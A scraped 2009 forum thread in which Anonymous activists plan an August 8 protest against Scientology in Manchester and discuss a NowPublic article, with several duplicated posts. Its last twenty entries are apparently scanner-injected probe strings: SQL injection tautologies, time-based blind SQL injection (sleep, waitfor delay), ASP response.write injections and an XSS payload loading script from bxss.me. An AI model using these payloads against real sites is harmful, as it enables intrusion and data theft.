Customize

August 8 - Manchester, England

Discussion in 'Europe' started by getbeckyout, Jul 16, 2009.

1. Roflmobile Member

Re: MANCHESTER AUGUST 8TH PROTEST 2009

I Lol'd.

Anyway.. I'll be there again this month, with at least one of my mates, maybe two.
    Only problem is the metrolink is fucked this month, so we might not be there from the start, depending on how long the replacement bus takes.
    I hope to see a lot of people this month, as last month was just god damn dissapointing. ಠ_ಠ
  2. CADEN Member

It would be great to see a new face at the protest ;)

[IMG]

Did you see the funny video yet?

Did you research into $cn views on multi personality disorder? fascinating stuff......
  3. shamonymous Member

oh my xenu, this thread is full of win
  4. CADEN Member

Yes, definately worth looking into. If you check on the comments now Sam has replied to UKDocumentary as Sam and not as Kevin, when UKDocumentary was asking a very polite question to Kevin. Looks like he has been trained by Tommy Davis personally at the art of FOOTBULLET :)
    Also he has started a thread in the forum below as Kevin complaining at vandalism of his story.
    Contribution vs. Vandalism | Forum Topic | NowPublic

And here is the link to the story comments:
    Manchester Spiritual Awareness Conference a success | NowPublic News Coverage, Page 2

now to find a named person to harpoon the editors, link below:
    NowPublic Editorial Team | NowPublic

Keep up the good work Sam and dont ever blow because you are too useful for us as our super undercover spy, oops didnt want your seniors to see that ;)

That video always cheers us up!, Doesnt look like W1lz shares our sense of humor........
    Should be a lot more coming to the protest this month, I think quite a few went to the London megaraid last.
  5. CADEN Member

Yes, definately worth looking into. If you check on the comments now Sam has replied to UKDocumentary as Sam and not as Kevin, when UKDocumentary was asking a very polite question to Kevin. Looks like he has been trained by Tommy Davis personally at the art of FOOTBULLET :)
    Also he has started a thread in the forum below as Kevin complaining at vandalism of his story.
    Contribution vs. Vandalism | Forum Topic | NowPublic

And here is the link to the story comments:
    Manchester Spiritual Awareness Conference a success | NowPublic News Coverage, Page 2

now to find a named person to harpoon the editors, link below:
    NowPublic Editorial Team | NowPublic

Keep up the good work Sam and dont ever blow because you are too useful for us as our super undercover spy, oops didnt want your seniors to see that ;)

That video always cheers us up!, Doesnt look like W1lz shares our sense of humor........
    Should be a lot more coming to the protest this month, I think quite a few went to the London megaraid last.
  6. aleale Member

Can't make it, will be there in principle

Havn't got round to getting a mask either

Gonna definatley go to the next one in Manc/the north
  7. strobe Member

Nice of Sam to give you a reply, albeit using it to slate you and the Woods.
    I did give it a read through last night, and there are several questions he hasn't *actually* answered. I don't have time to pick through it now, but don't be fooled by the longwindedness of the reply.

Glad to say I will be at this raid :D but won't have internet over the weekend, so hope plans don't change or I won't find out XD

See you all there
    • Like Like x 1
  8. strobe Member

Nice of Sam to give you a reply, albeit using it to slate you and the Woods.
    I did give it a read through last night, and there are several questions he hasn't *actually* answered. I don't have time to pick through it now, but don't be fooled by the longwindedness of the reply.

Glad to say I will be at this raid :D but won't have internet over the weekend, so hope plans don't change or I won't find out XD

See you all there
    • Like Like x 1
  9. Roflmobile Member

Glad to hear it.
    The interest looks promising this month, so hopefully we'll have a decent turnout and one hell of a protest.
  10. i'mglib Member

Your friends in Southern California are looking forward to the videos, woot.
  11. getbeckyout Member

ITS ON NO PROBLEM AND THANK YOU.

Tony
  12. outoforder Member

I'll be there nice & early. See yee all there
  13. UKDocumentary Member

[IMG]
    Scientologists, Anonymous and family and friends of both, state your case and or belief regarding the controversial Church of Scientology.

Manchester, 258 Deansgate tomorrow August 8th 2009 at 12:00pm. Anonymous and the Church of Scientology will be the back drop for your case or concern. For or against, it’s your chance to have your say on camera with or without a disguise. Prepare your statements and if you can not remember everything you want to say, I recommend printing it off and reading it from your paper. What you say I guarantee will be available to be seen by the UK and the rest of the world. Your efforts will not be in vein, for or against this is all about you, the ones who want to talk.

Note for the general public, the Church of Scientology here in the UK is a self acclaimed religion. It does not have religious status here in the UK. The Church of Scientology has no comment on this statement.

Anonymous V Scientology
  14. CADEN Member

Coming from London so will try to get there early as possible :)

Also we just had confirmation that several high ranking public Scientologists are now very disaffected which is a major step towards leaving the cult. Epic Win
  15. aronymous Member

damn the one time i can't come to a protest, sounds like its gona be a good one.
  16. SovietV Member

poster48294605py5.jpg
    By sovietv at 2008-07-14
    Just popping in to say I miss you guys!
  17. CADEN Member

18. response.write(9245258*9742569)
  19. '+response.write(9245258*9742569)+'
  20. -1 OR 2+555-555-1=0+0+0+1 --
  21. "+response.write(9245258*9742569)+"
  22. -1 OR 2+630-630-1=0+0+0+1
  23. response.write(9167516*9762240)
  24. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-39587&h=3-0b095-2&/).slice(2),document.documentElement.appendChild(s))//'>
  25. -1' OR 2+98-98-1=0+0+0+1 --
  26. '+response.write(9167516*9762240)+'
  27. -1' OR 2+670-670-1=0+0+0+1 or 'ka9BPm20'='
  28. "+response.write(9167516*9762240)+"
  29. -1" OR 2+397-397-1=0+0+0+1 --
  30. response.write(9644920*9644671)
  31. if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
  32. '+response.write(9644920*9644671)+'
  33. (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
  34. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-39589&h=3-0b095-2&/).slice(2),document.documentElement.appendChild(s))//'>
  35. "+response.write(9644920*9644671)+"
  36. -1; waitfor delay '0:0:3' --
  37. -1); waitfor delay '0:0:3' --